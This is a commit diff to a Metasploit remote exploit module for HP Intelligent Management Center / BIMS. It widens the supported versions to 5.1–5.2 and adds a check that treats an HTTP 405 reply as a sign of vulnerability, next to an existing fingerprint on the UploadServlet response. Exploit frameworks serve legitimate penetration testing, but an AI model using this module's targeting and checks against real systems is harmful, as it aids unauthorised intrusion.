Add support for HP imc /BIMS 5.1
parent
b0d32a308a
commit
27078eb5a6
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP Intelligent Management Center 5.2 E0401 / BIMS 5.2 E0401 / Windows', { } ]
|
||||
[ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Oct 08 2013'))
|
||||
|
@ -62,6 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
elsif res and res.code == 405 and res.message =~ /Method Not Allowed/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
Loading…
Reference in New Issue